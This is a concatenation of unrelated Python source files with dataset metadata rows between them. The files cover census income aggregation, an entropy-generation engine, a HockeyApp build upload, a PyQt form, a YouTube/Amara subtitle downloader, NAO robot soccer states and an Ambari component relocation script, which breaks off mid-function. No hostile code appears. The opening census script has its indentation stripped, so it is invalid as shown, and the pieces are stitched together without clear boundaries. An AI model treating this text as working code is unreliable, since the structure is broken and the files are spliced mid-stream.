# extracts information from the specified metadata file and returns it as a
# data frame
#
def processMetaData(metafile):
csvdata = pd.read_csv(metafile,header=None)
#print csvdata
print("parsing file: " + metafile)
return csvdata
#
# modifyDataLabels
#
# function to modify data lables for the specified target using values in
# dict_fields
#
# Returns:
# ratio_dict - dictionary of modified labels grouped by ratio range
# age_dict - dictionary of modified labels grouped by age range
# modifiedLabels - full list of modified labels (same ordering as that of
# targetLabels)
#
def modifyDataLabels(targetLabels, df_fields):
# convert to dictionary for easier lookup
dict_fields = df_fields.set_index(0).T.to_dict('list')
# generate the regex instance for the specified pattern
prefix = " - "
regex = re.compile('(.*); (.*) years(.*):(.*)')
# generate replacement labels for targeted labels using metadata
# in df_fields
modifiedLabels = []
    # FIX ME: need an ordered default dict; for now use ordered dict only
ratio_dict = OrderedDict(); age_dict = OrderedDict()
for name in targetLabels[1:]:
if name in dict_fields:
m = regex.match(dict_fields[name][0])
ratioTag = ""; ageTag = ""
if m.group(4).startswith(prefix):
ratioTag = m.group(4)[len(prefix):]
else:
ratioTag = "Total"
ageTag = m.group(2) + m.group(3)
label = ratioTag + " (" + ageTag + ")"
#print (name + ": " + label)
if ageTag in age_dict:
age_dict[ageTag].append(label)
else:
age_dict[ageTag] = [label]
if ratioTag in ratio_dict:
ratio_dict[ratioTag].append(label)
else:
ratio_dict[ratioTag] = [label]
modifiedLabels.append(label)
else:
modifiedLabels.append(name)
return ratio_dict, age_dict, modifiedLabels
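# For example (illustrative metadata string): a column described as
# "Estimate; 55 to 64 years: - 1.85 to 1.99" is relabelled "1.85 to 1.99 (55 to 64)"
# and grouped under both that ratio bucket and that age bucket.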
#
# addSRAaggregates
#
# aggregates per zipcode/ZCTA data and populates the unique entry per SRA with
# the aggreagated values (in the specified data frame) and returns the modified
# data frame
#
# Note: this requires that data be in a specific format (see df_geoids dataframe)
#
def addSRAaggregates(df,targetCols):
for name, group in df.groupby('SRA'):
idx = group.last_valid_index()
#print df.loc[[idx]]
for col in targetCols:
df.set_value(idx,col,group[col].sum())
return df
#
# computeLowIncomeData
#
# aggregates data for all ratios below 2.00 for all age groups and returns
# the result in a new data frame
#
def computeLowIncomeData(df_incomes,df_geoids,ratio_dict,age_dict):
# low income is defined as 200% (or below) of the federal poverty level
# i.e.: the income to poverty level ratio under 2.0
LOW_INCOME_RATIO_TRESH = "1.85 to 1.99"
geoCols = df_geoids.columns.tolist()
df = df_incomes.iloc[:,len(geoCols):]
df = df_incomes.reset_index(drop=True)
df_sum_list = []
cols = []
for age_group, colnames in age_dict.iteritems():
#print(str(age_group) + ": " + str(colnames))
try:
idx = [i for i, s in enumerate(colnames) if LOW_INCOME_RATIO_TRESH in s]
df_sum = df[colnames[1:(idx[0]+1)]].sum(axis=1)
df_sum_list.append(df_sum)
except Exception, e:
df_sum = pd.DataFrame(columns=[age_group],
data=np.zeros(shape=(len(df_geoids.index),1)))
df_sum_list.append(df_sum)
cols.append(age_group + " (Low Income)")
df1 = pd.concat(df_sum_list,axis=1)
df1.columns = cols
df1["55 and Over (Low Income)"] = df1[cols].sum(axis=1)
df1["65 and Over (Low Income)"] = df1[cols[1:]].sum(axis=1)
li_df = pd.concat([df_geoids,df1],axis=1)
li_df = addSRAaggregates(li_df,df1.columns.tolist())
#print li_df
return li_df
#
# processData
#
# extracts relevant information from the specified data file and carries out
# transformations to generate income data for age groups 55 and over as well
# for low income individuals 55 and over on a per ZCTA basis
#
# results are written to CSV files specified by OUT_CSV{1,2}
#
def processData(df_fields,datafile):
# index of GEO.id2 which contains ZCTA as numbers
COL_ZCTA_IDX = 1
COL_ZCTA = 'GEO.id2'
# this is the first field that holds income info for 55+ age groups
START_COL = 'HD01_VD93'
# extract only data for income estimates for 55 and over categories
startIndex = df_fields[df_fields[0] == START_COL].index.tolist()[0]
endIndex = len(df_fields) - 1
# print("si: " + str(startIndex) + " ei: " + str(endIndex))
l = df_fields[0].tolist()
# we skip over cols that contain margins of error (i.e.: every other col)
cols = [l[COL_ZCTA_IDX]] + l[startIndex:endIndex:2]
csvdata = pd.read_csv(datafile,skipinitialspace=True,usecols=cols)
#print csvdata.head()
print("parsing data file: " + datafile)
df_geoids = sdpy.createGeoidsData()
geoCols = df_geoids.columns.tolist()
# add single level col headers with age and ratio tags
ratio_dict, age_dict, modifiedCols = modifyDataLabels(cols,df_fields)
out_df = pd.merge(left=df_geoids,right=csvdata[1:],left_on='ZCTA',
right_on=COL_ZCTA,how='left').fillna(0)
out_df.drop(COL_ZCTA,axis=1,inplace=True)
out_df.columns = geoCols + modifiedCols
tmp_df = out_df[modifiedCols].apply(pd.to_numeric)
out_df = pd.concat([df_geoids,tmp_df],axis=1)
out_df.columns = geoCols + modifiedCols
li_df = computeLowIncomeData(tmp_df,df_geoids,ratio_dict,age_dict)
#print li_df.head()
li_df.to_csv(OUT_CSV2, index=False)
print("output: " + OUT_CSV2)
out_df = addSRAaggregates(out_df,modifiedCols)
#print out_df.head()
out_df.to_csv(OUT_CSV1, index=False)
print("output: " + OUT_CSV1)
################################################################################
#
# main
#
def main():
# indicates whether to cleanup before exiting the script
doCleanup = False
metadataFile = ''; dataFile = ''
if not os.path.exists(TMPDIR):
os.makedirs(TMPDIR)
doCleanup = True
# unzip the archive
try:
zipf = ZipFile(os.path.join(CWD,DATAZIP),'r')
zipf.extractall(TMPDIR)
zipf.close()
for file in os.listdir(TMPDIR):
if file.endswith("metadata.csv"):
metadataFile = file
elif file.endswith("ann.csv"):
dataFile = file
else:
continue
#print("metadata file: " + metadataFile + " data file: " + dataFile)
df_fields = processMetaData(os.path.join(TMPDIR,metadataFile))
processData(df_fields, os.path.join(TMPDIR,dataFile))
except:
e = sys.exc_info()[0]
print("Error: Failed to extract data archive")
print("Error: " + str(e))
cleanup(doCleanup)
exit()
cleanup(doCleanup)
# end: main
if __name__ == "__main__":
main()
else:
# do nothing
pass
| mit | 8,053,278,188,660,006,000 | 25.345638 | 82 | 0.642287 | false | 3.029368 | false | false | false |
Virginian/WES-entropy-client | src-python/WesEntropy/Engine/engine.py | 1 | 5656 | # Copyright 2014-2015 Whitewood Encryption Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''WES Entropy Engine'''
import logging
import time
import WesEntropy.Engine.utilities as utilities
import WesEntropy.Engine.sp800_90a as sp800_90a
import WesEntropy.Engine.entropysource as entropysource
VERSION = '1.0'
#pylint: disable=R0903
class EntropyEngine(object):
'''
Construct an entropy engine of the following form:
drbg_source raw_source
| |
| (rate) |
V V
drbg---------------->XOR
|
|
V
rand_bits
This abstracts all the constructions in NIST SP800-90C, while also
allowing for other implementations as needed.
The sources are to be EntropySource objects, or a specification for
constructing an EntropySource object. The rate at which the DRBG is
to be reseeded can be numeric, indicating the number of times we
can pull bits from the source before we reseed, or one of the
following string values:
MINIMAL : Go the longest that NIST SP800-90A allows in this case.
LINESPEED : Put in one bit of entropy for each bit we take out.
'''
def __init__(self, drbg_spec, drbg_source, drbg_reseed_rate, raw_source):
self.drbg = None
self.raw = None
if drbg_spec is not None and drbg_source is not None:
self.drbg = sp800_90a.new(drbg_spec, drbg_source, drbg_reseed_rate)
if raw_source is not None:
self.raw = entropysource.new(raw_source)
self.total_bytes = 0
self.start_time = time.time()
if not self.drbg and not self.raw:
raise ValueError(
'Cannot construct engine with neither DRBG nor raw source.')
def get_stats(self):
'''Get statistics on amount of entropy consumed/produced'''
stats = {'info': {},
'consumed': {},
'produced': {}}
stats['info']['engine_uptime'] = time.time() - self.start_time
stats['info']['version'] = VERSION
if self.raw is not None:
stats['info']['stream'] = self.raw.get_name()
if self.drbg is not None:
stats['info']['seed'] = self.drbg.entropy_source.get_name()
stats['info']['drbg'] = self.drbg.get_name()
stats['consumed'] = entropysource.get_all_stats()
stats['produced'] = self.total_bytes
return stats
def cleanup(self):
'''Uninstantiate DRBG and close any raw entropy source'''
if self.drbg:
self.drbg.uninstantiate()
if self.raw:
self.raw.close_entropy_source()
#pylint: disable=R0911
def generate(self, n_bits, security_strength = None,
prediction_resistance = None, additional_input = ''):
'Generate bits from the entropy engine.'
#
# If we have a DRBG then use it
if self.drbg:
status, drbg_bits = self.drbg.generate(
n_bits, security_strength,
prediction_resistance, additional_input)
# The DRBG, once instantiated, should never fail
if status != 'SUCCESS' and status != 'RESEED_FAILED':
return status, "DRBG failed"
# If we are combining the DRBG with raw input then get raw bits
if self.raw:
status, raw_bits = self.raw.get_entropy_input(
security_strength, n_bits,
n_bits, prediction_resistance)
# Failure here is allowable, because we still have the DRBG
if status != 'SUCCESS':
logging.debug(
"Using drbg only. %s, %s", status, raw_bits)
self.total_bytes += len(drbg_bits)
return 'DRBG_ONLY', drbg_bits
# If we have both sources working then XOR them together
comb_bits = utilities.binstr_xor(drbg_bits, raw_bits)
self.total_bytes += len(comb_bits)
return 'SUCCESS', comb_bits
# If we only have a DRBG, then return just those bits
else:
self.total_bytes += len(drbg_bits)
return 'SUCCESS', drbg_bits
# If we have no DRBG then we must have a raw entropy source
elif self.raw:
status, raw_bits = self.raw.get_entropy_input(
security_strength, n_bits,
n_bits, prediction_resistance)
# If this fails with no DRBG to back it up, return an error
if status != 'SUCCESS':
return status, "Raw source failed"
# Otherwise return the raw bits
self.total_bytes += len(raw_bits)
return 'SUCCESS', raw_bits
# If we have neither DRBG nor raw source, we cannot generate bits
return 'ERROR', "Neither DRBG nor raw source available"
#pylint: enable=R0911
| apache-2.0 | 2,504,217,206,947,107,000 | 35.727273 | 79 | 0.579385 | false | 4.080808 | false | false | false |
ConorIA/wire-desktop | bin/win-hockey.py | 1 | 2241 | #!/usr/bin/env python
# coding: utf-8
#
# Wire
# Copyright (C) 2017 Wire Swiss GmbH
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
import os
import requests
import zipfile
HOCKEY_ID = os.environ.get('WIN_HOCKEY_ID')
HOCKEY_TOKEN = os.environ.get('WIN_HOCKEY_TOKEN')
VERSION = os.environ.get('WRAPPER_BUILD').split('#')[1]
HOCKEY_UPLOAD = 'https://rink.hockeyapp.net/api/2/apps/%s/app_versions/' % HOCKEY_ID
HOCKEY_NEW = 'https://rink.hockeyapp.net/api/2/apps/%s/app_versions/new' % HOCKEY_ID
bin_root = os.path.dirname(os.path.realpath(__file__))
wire_exe = os.path.join(bin_root, '..', 'wrap', 'internal', 'WireInternal-win32-ia32', 'WireInternalSetup.exe')
wire_zip = os.path.join(bin_root, 'WireInternalSetup.zip')
def zipit(source, dest):
os.chdir(os.path.dirname(os.path.abspath(source)))
filename = os.path.basename(source)
zipf = zipfile.ZipFile(dest, 'w')
zipf.write(filename)
zipf.close()
if __name__ == '__main__':
print 'Compressing...'
zipit(wire_exe, wire_zip)
print 'Uploading %s...' % VERSION
semver_version = VERSION.split('.')
headers = {
'X-HockeyAppToken': HOCKEY_TOKEN,
}
data = {
'notify': 0,
'notes': 'Jenkins Build',
'status': 2,
'bundle_short_version': '%s.%s' % (semver_version[0], semver_version[1]),
'bundle_version': semver_version[2],
}
files = {
'ipa': open(wire_zip, 'rb')
}
response = requests.post(HOCKEY_NEW, data=data, headers=headers)
response = requests.put('%s%s' % (HOCKEY_UPLOAD, response.json()['id']), files=files, data=data, headers=headers)
if response.status_code in [200, 201]:
print 'Uploaded!'
else:
print 'Error :('
| gpl-3.0 | -7,979,401,355,987,615,000 | 28.88 | 115 | 0.686301 | false | 3.091034 | false | false | false |
danielhrisca/asammdf | asammdf/gui/ui/attachment.py | 1 | 1984 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'attachment.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Attachment(object):
def setupUi(self, Attachment):
Attachment.setObjectName("Attachment")
Attachment.resize(717, 205)
self.horizontalLayout = QtWidgets.QHBoxLayout(Attachment)
self.horizontalLayout.setObjectName("horizontalLayout")
self.number = QtWidgets.QLabel(Attachment)
self.number.setObjectName("number")
self.horizontalLayout.addWidget(self.number)
self.fields = QtWidgets.QTreeWidget(Attachment)
self.fields.setMinimumSize(QtCore.QSize(0, 187))
self.fields.setObjectName("fields")
self.fields.header().setVisible(True)
self.fields.header().setMinimumSectionSize(100)
self.horizontalLayout.addWidget(self.fields)
self.extract_btn = QtWidgets.QPushButton(Attachment)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/export.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.extract_btn.setIcon(icon)
self.extract_btn.setObjectName("extract_btn")
self.horizontalLayout.addWidget(self.extract_btn)
self.horizontalLayout.setStretch(1, 1)
self.retranslateUi(Attachment)
QtCore.QMetaObject.connectSlotsByName(Attachment)
def retranslateUi(self, Attachment):
_translate = QtCore.QCoreApplication.translate
Attachment.setWindowTitle(_translate("Attachment", "Form"))
self.number.setText(_translate("Attachment", "Number"))
self.fields.headerItem().setText(0, _translate("Attachment", "Item"))
self.fields.headerItem().setText(1, _translate("Attachment", "Value"))
self.extract_btn.setText(_translate("Attachment", "Extract"))
from . import resource_rc
| lgpl-3.0 | 7,336,654,808,283,836,000 | 42.088889 | 90 | 0.68246 | false | 4.266667 | false | false | false |
danielhollas/AmaraUpload | download_subs.py | 1 | 4471 | #!/usr/bin/env python3
import argparse, sys, os, requests
from subprocess import Popen, PIPE
from pprint import pprint
from api.amara_api import Amara
from utils import answer_me, download_yt_subtitles
from time import sleep
def read_cmd():
"""Function for reading command line options."""
desc = "Program for downloading subtitles from Amara or YouTube. \
The video from YouTube can be downloaded as well."
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('input_file', metavar='INPUT_FILE', help='Text file containing YouTube IDs and possibly filenames.')
parser.add_argument('-l','--lang', dest='lang', required = True, help='Which language do we download?')
parser.add_argument('-y', dest='youtube', action="store_true", help='Download subtitles from YouTube.')
parser.add_argument('-a', dest='amara', action="store_true", help='Download subtitles from Amara.')
parser.add_argument('-v', '--video', dest='video', action="store_true", default=False, help='Download video from YouTube in addition to subtitles.')
parser.add_argument('-d', '--dir', dest='dirname', default='subs', help='Destination directory for subtitles')
parser.add_argument(
'--sub-format', dest = 'sub_format',
required = False, default = 'vtt',
help='What language?')
parser.add_argument(
'-s', '--sleep', dest = 'sleep_int',
required = False, type = float, default = -1,
help='Sleep interval (seconds)')
return parser.parse_args()
opts = read_cmd()
if opts.youtube and opts.sub_format != 'vtt':
eprint("ERROR: YouTube download only support vtt format!")
sys.exit(1)
if opts.youtube == True and opts.amara == True:
print('Conflicting options "-y" and "-a"')
print('Type "-h" for help')
sys.exit(1)
if opts.youtube == False and opts.amara == False:
print('Please, set either "-y" or "-a".')
print('Type "-h" for help')
sys.exit(1)
# List ytids may also contain filenames
ytids = []
# Reading file with YT id's
with open(opts.input_file, "r") as f:
for line in f:
l = line.split(' ')
if l[0][0] != "#":
ytids.append(line.split())
if not os.path.isdir(opts.dirname):
os.mkdir(opts.dirname)
try:
os.remove("youtubedl.out")
os.remove("youtubedl.err")
except:
pass
if opts.amara:
amara = Amara()
# Main loop
for i in range(len(ytids)):
ytid = ytids[i][0]
video_url = 'https://www.youtube.com/watch?v=%s' % ytid
amara_id = ''
if opts.video:
video_download_cmd = "youtube-dl %s" % video_url
p = Popen(video_download_cmd, shell=True, stdout=PIPE, stderr=PIPE)
out, err = p.communicate()
with open("youtubedl.out", 'a') as f:
f.write(out.decode('UTF-8'))
if err:
print(err)
sys.exit(1)
else:
print("Successfully downloaded video from %s" % video_url)
if opts.youtube:
subs = download_yt_subtitles(opts.lang, opts.sub_format, ytid, opts.dirname)
elif opts.amara:
# TODO: Extract this to utils as well.
# First, get Amara ID
amara_response = amara.check_video(video_url)
if amara_response['meta']['total_count'] == 0:
print("ERROR: Video is not on Amara! YTID=%s" % ytid)
sys.exit(1)
else:
amara_id = amara_response['objects'][0]['id']
amara_title = amara_response['objects'][0]['title']
print("Downloading %s subtitles for YTID=%s" % (opts.lang, ytid))
print("Title: %s" % amara_title)
print("%s/cs/videos/%s" % (amara.AMARA_BASE_URL, amara_id))
# Check whether subtitles for a given language are present,
is_present, sub_version = amara.check_language(amara_id, opts.lang)
if is_present and sub_version > 0:
print("Subtitle revision number: %d" % sub_version)
else:
print("ERROR: Amara does not have subtitles for language %s for this video!" % opts.lang)
sys.exit(1)
# Download and write subtitles from Amara for a given language
subs = amara.download_subs(amara_id, opts.lang, opts.sub_format)
fname = "%s/%s.%s.%s" % (opts.dirname, ytid, opts.lang, opts.sub_format)
with open(fname, 'w') as f:
f.write(subs)
# Trying to reduce E 429
if opts.sleep_int > 0:
sleep(opts.sleep_int)
| mit | 8,237,329,518,348,567,000 | 35.647541 | 151 | 0.615075 | false | 3.428681 | false | false | false |
northern-bites/nao-man | noggin/players/BrunswickStates.py | 1 | 5661 | from ..playbook.PBConstants import (GOALIE, CHASER)
import man.motion.SweetMoves as SweetMoves
###
# Reimplementation of Game Controller States for pBrunswick
###
def gameInitial(player):
"""
Ensure we are sitting down and head is snapped forward.
In the future, we may wish to make the head move a bit slower here
Also, in the future, gameInitial may be responsible for turning off the gains
"""
if player.firstFrame():
player.isChasing = False
player.inKickingState = False
player.justKicked = False
player.stopWalking()
player.gainsOn()
player.zeroHeads()
player.GAME_INITIAL_satDown = False
elif (player.brain.nav.isStopped() and not player.GAME_INITIAL_satDown
and not player.motion.isBodyActive()):
player.GAME_INITIAL_satDown = True
player.executeMove(SweetMoves.SIT_POS)
return player.stay()
def gamePenalized(player):
if player.firstFrame():
player.isChasing = False
player.inKickingState = False
player.justKicked = False
player.stopWalking()
player.penalizeHeads()
return player.stay()
def gameReady(player):
"""
Stand up, and pan for localization
"""
if player.firstFrame():
player.isChasing = False
player.inKickingState = False
player.justKicked = False
player.brain.CoA.setRobotGait(player.brain.motion)
if player.squatting:
player.executeMove(SweetMoves.GOALIE_SQUAT_STAND_UP)
player.squatting = False
else:
player.standup()
if player.brain.gameController.ownKickOff:
player.hasKickedOffKick = False
else:
player.hasKickedOffKick = True
player.standup()
player.brain.tracker.locPans()
if player.lastDiffState == 'gameInitial':
return player.goLater('relocalize')
if player.firstFrame() and \
player.lastDiffState == 'gamePenalized':
player.brain.resetLocalization()
return player.goLater('playbookPosition')
def gameSet(player):
"""
Fixate on the ball, or scan to look for it
"""
if player.firstFrame():
player.isChasing = False
player.inKickingState = False
player.justKicked = False
player.brain.CoA.setRobotGait(player.brain.motion)
if player.firstFrame() and player.lastDiffState == 'gamePenalized':
player.brain.resetLocalization()
if player.firstFrame():
player.stopWalking()
player.brain.loc.resetBall()
if player.brain.play.isRole(GOALIE):
player.brain.resetGoalieLocalization()
if player.brain.play.isRole(CHASER):
player.brain.tracker.trackBall()
else:
player.brain.tracker.activeLoc()
return player.stay()
def gamePlaying(player):
if player.firstFrame():
player.brain.CoA.setRobotGait(player.brain.motion)
if (player.firstFrame() and
player.lastDiffState == 'gamePenalized'):
player.brain.resetLocalization()
roleState = player.getRoleState()
return player.goNow(roleState)
def penaltyShotsGameReady(player):
if player.firstFrame():
player.brain.CoA.setRobotGait(player.brain.motion)
if player.firstFrame():
if player.lastDiffState == 'gamePenalized':
player.brain.resetLocalization()
player.brain.tracker.locPans()
player.walkPose()
if player.brain.play.isRole(GOALIE):
player.brain.resetGoalieLocalization()
return player.stay()
def penaltyShotsGameSet(player):
if player.firstFrame():
player.brain.CoA.setRobotGait(player.brain.motion)
if player.firstFrame():
player.stopWalking()
player.brain.loc.resetBall()
if player.lastDiffState == 'gamePenalized':
player.brain.resetLocalization()
if player.brain.play.isRole(GOALIE):
player.brain.tracker.trackBall()
else:
player.brain.tracker.activeLoc()
if player.brain.play.isRole(GOALIE):
player.brain.resetGoalieLocalization()
return player.stay()
def penaltyShotsGamePlaying(player):
if player.firstFrame():
player.brain.CoA.setRobotGait(player.brain.motion)
if player.lastDiffState == 'gamePenalized' and \
player.firstFrame():
player.brain.resetLocalization()
if player.brain.play.isRole(GOALIE):
return player.goNow('penaltyGoalie')
return player.goNow('penaltyKick')
def fallen(player):
"""
Stops the player when the robot has fallen
"""
player.isChasing = False
player.inKickingState = False
player.justKicked = False
return player.stay()
def gameFinished(player):
"""
Ensure we are sitting down and head is snapped forward.
In the future, we may wish to make the head move a bit slower here
Also, in the future, gameInitial may be responsible for turning off the gains
"""
if player.firstFrame():
player.isChasing = False
player.inKickingState = False
player.justKicked = False
player.stopWalking()
player.zeroHeads()
player.GAME_FINISHED_satDown = False
return player.stay()
# Sit down once we've finished walking
if (player.brain.nav.isStopped() and not player.GAME_FINISHED_satDown
and not player.motion.isBodyActive()):
player.GAME_FINISHED_satDown = True
player.executeMove(SweetMoves.SIT_POS)
return player.stay()
if not player.motion.isBodyActive() and player.GAME_FINISHED_satDown:
player.gainsOff()
return player.stay()
| gpl-3.0 | -1,766,548,898,769,186,300 | 29.766304 | 81 | 0.661367 | false | 3.683149 | false | false | false |
zouzhberk/ambaridemo | demo-server/src/main/resources/scripts/relocate_host_components.py | 1 | 16871 | #!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import optparse
import sys
import os
import logging
import tempfile
import urllib2
import socket
import json
import base64
import time
AMBARI_HOSTNAME = None
AMBARI_PORT = 8080
CLUSTER_NAME = None
PROTOCOL = "http"
USERNAME = "admin"
PASSWORD = "admin"
DEFAULT_TIMEOUT = 10 # seconds
START_ON_RELOCATE = False
# Supported Actions
RELOCATE_ACTION = 'relocate'
ALLOWED_ACTUAL_STATES_FOR_RELOCATE = [ 'INIT', 'UNKNOWN', 'DISABLED', 'UNINSTALLED' ]
ALLOWED_HOST_STATUS_FOR_RELOCATE = [ 'HEALTHY' ]
STATUS_WAIT_TIMEOUT = 120 # seconds
STATUS_CHECK_INTERVAL = 10 # seconds
# API calls
GET_CLUSTERS_URI = "/api/v1/clusters/"
GET_HOST_COMPONENTS_URI = "/api/v1/clusters/{0}/services/{1}/components/{2}" +\
"?fields=host_components"
GET_HOST_COMPONENT_DESIRED_STATE_URI = "/api/v1/clusters/{0}/hosts/{1}" +\
"/host_components/{2}" +\
"?fields=HostRoles/desired_state"
GET_HOST_COMPONENT_STATE_URI = "/api/v1/clusters/{0}/hosts/{1}" +\
"/host_components/{2}" +\
"?fields=HostRoles/state"
GET_HOST_STATE_URL = "/api/v1/clusters/{0}/hosts/{1}?fields=Hosts/host_state"
HOST_COMPONENT_URI = "/api/v1/clusters/{0}/hosts/{1}/host_components/{2}"
ADD_HOST_COMPONENT_URI = "/api/v1/clusters/{0}/hosts?Hosts/host_name={1}"
logger = logging.getLogger()
class PreemptiveBasicAuthHandler(urllib2.BaseHandler):
def __init__(self):
password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
password_mgr.add_password(None, getUrl(''), USERNAME, PASSWORD)
self.passwd = password_mgr
self.add_password = self.passwd.add_password
def http_request(self, req):
uri = req.get_full_url()
user = USERNAME
pw = PASSWORD
raw = "%s:%s" % (user, pw)
auth = 'Basic %s' % base64.b64encode(raw).strip()
req.add_unredirected_header('Authorization', auth)
return req
class AmbariResource:
def __init__(self, serviceName, componentName):
self.serviveName = serviceName
self.componentName = componentName
self.isInitialized = False
def initializeResource(self):
global CLUSTER_NAME
if CLUSTER_NAME is None:
CLUSTER_NAME = self.findClusterName()
if self.serviveName is None:
raise Exception('Service name undefined')
if self.componentName is None:
raise Exception('Component name undefined')
handler = PreemptiveBasicAuthHandler()
opener = urllib2.build_opener(handler)
# Install opener for all requests
urllib2.install_opener(opener)
self.urlOpener = opener
self.old_hostname = self.getHostname()
self.isInitialized = True
def relocate(self, new_hostname):
if not self.isInitialized:
raise Exception('Resource not initialized')
# If old and new hostname are the same exit harmlessly
if self.old_hostname == new_hostname:
logger.error('New hostname is same as existing host name, %s' % self.old_hostname)
sys.exit(2)
pass
try:
self.verifyHostComponentStatus(self.old_hostname, new_hostname, self.componentName)
except Exception, e:
logger.error("Exception caught on verify relocate request.")
logger.error(e.message)
sys.exit(3)
# Put host component in Maintenance state
self.updateHostComponentStatus(self.old_hostname, self.componentName,
"Disable", "DISABLED")
# Delete current host component
self.deleteHostComponent(self.old_hostname, self.componentName)
# Add component on the new host
self.addHostComponent(new_hostname, self.componentName)
# Install host component
self.updateHostComponentStatus(new_hostname, self.componentName,
"Installing", "INSTALLED")
# Wait on install
self.waitOnHostComponentUpdate(new_hostname, self.componentName,
"INSTALLED")
if START_ON_RELOCATE:
# Start host component
self.updateHostComponentStatus(new_hostname, self.componentName,
"Starting", "STARTED")
# Wait on start
self.waitOnHostComponentUpdate(new_hostname, self.componentName, "STARTED")
pass
pass
def waitOnHostComponentUpdate(self, hostname, componentName, status):
logger.info("Waiting for host component status to update ...")
sleep_itr = 0
state = None
while sleep_itr < STATUS_WAIT_TIMEOUT:
try:
state = self.getHostComponentState(hostname, componentName)
if status == state:
logger.info("Status update successful. status: %s" % state)
return
pass
except Exception, e:
logger.error("Caught an exception waiting for status update.. "
"continuing to wait...")
pass
time.sleep(STATUS_CHECK_INTERVAL)
sleep_itr += STATUS_CHECK_INTERVAL
pass
if state and state != status:
logger.error("Timed out on wait, status unchanged. status = %s" % state)
sys.exit(1)
pass
pass
def addHostComponent(self, hostname, componentName):
data = '{"host_components":[{"HostRoles":{"component_name":"%s"}}]}' % self.componentName
req = urllib2.Request(getUrl(ADD_HOST_COMPONENT_URI.format(CLUSTER_NAME,
hostname)), data)
req.add_header("X-Requested-By", "ambari_probe")
req.get_method = lambda: 'POST'
try:
logger.info("Adding host component: %s" % req.get_full_url())
resp = self.urlOpener.open(req)
self.logResponse('Add host component response: ', resp)
except Exception, e:
logger.error('Create host component failed, component: {0}, host: {1}'
.format(componentName, hostname))
logger.error(e)
raise e
pass
def deleteHostComponent(self, hostname, componentName):
req = urllib2.Request(getUrl(HOST_COMPONENT_URI.format(CLUSTER_NAME,
hostname, componentName)))
req.add_header("X-Requested-By", "ambari_probe")
req.get_method = lambda: 'DELETE'
try:
logger.info("Deleting host component: %s" % req.get_full_url())
resp = self.urlOpener.open(req)
self.logResponse('Delete component response: ', resp)
except Exception, e:
logger.error('Delete {0} failed.'.format(componentName))
logger.error(e)
raise e
pass
def updateHostComponentStatus(self, hostname, componentName, contextStr, status):
# Update host component
data = '{"RequestInfo":{"context":"%s %s"},"Body":{"HostRoles":{"state":"%s"}}}' % (contextStr, self.componentName, status)
req = urllib2.Request(getUrl(HOST_COMPONENT_URI.format(CLUSTER_NAME,
hostname, componentName)), data)
req.add_header("X-Requested-By", "ambari_probe")
req.get_method = lambda: 'PUT'
try:
logger.info("%s host component: %s" % (contextStr, req.get_full_url()))
resp = self.urlOpener.open(req)
self.logResponse('Update host component response: ', resp)
except Exception, e:
logger.error('Update Status {0} failed.'.format(componentName))
logger.error(e)
raise e
pass
def verifyHostComponentStatus(self, old_hostname, new_hostname, componentName):
# Check desired state of host component is not STOPPED or host is
# unreachable
actualState = self.getHostComponentState(old_hostname, componentName)
if actualState not in ALLOWED_ACTUAL_STATES_FOR_RELOCATE:
raise Exception('Aborting relocate action since host component '
'state is %s' % actualState)
hostState = self.getHostSatus(new_hostname)
if hostState not in ALLOWED_HOST_STATUS_FOR_RELOCATE:
raise Exception('Aborting relocate action since host state is %s' % hostState)
pass
def getHostSatus(self, hostname):
hostStateUrl = getUrl(GET_HOST_STATE_URL.format(CLUSTER_NAME, hostname))
logger.info("Requesting host status: %s " % hostStateUrl)
urlResponse = self.urlOpener.open(hostStateUrl)
state = None
if urlResponse:
response = urlResponse.read()
data = json.loads(response)
logger.debug('Response from getHostSatus: %s' % data)
if data:
try:
hostsInfo = data.get('Hosts')
if not hostsInfo:
raise Exception('Cannot find host state for host: {1}'.format(hostname))
state = hostsInfo.get('host_state')
except Exception, e:
logger.error('Unable to parse json data. %s' % data)
raise e
pass
else:
logger.error("Unable to retrieve host state.")
pass
return state
def getHostComponentState(self, hostname, componentName):
hostStatusUrl = getUrl(GET_HOST_COMPONENT_STATE_URI.format(CLUSTER_NAME,
hostname, componentName))
logger.info("Requesting host component state: %s " % hostStatusUrl)
urlResponse = self.urlOpener.open(hostStatusUrl)
state = None
if urlResponse:
response = urlResponse.read()
data = json.loads(response)
logger.debug('Response from getHostComponentState: %s' % data)
if data:
try:
hostRoles = data.get('HostRoles')
if not hostRoles:
raise Exception('Cannot find host component state for component: ' +\
'{0}, host: {1}'.format(componentName, hostname))
state = hostRoles.get('state')
except Exception, e:
logger.error('Unable to parse json data. %s' % data)
raise e
pass
else:
logger.error("Unable to retrieve host component desired state.")
pass
return state
# Log response for PUT, POST or DELETE
def logResponse(self, text=None, response=None):
if response is not None:
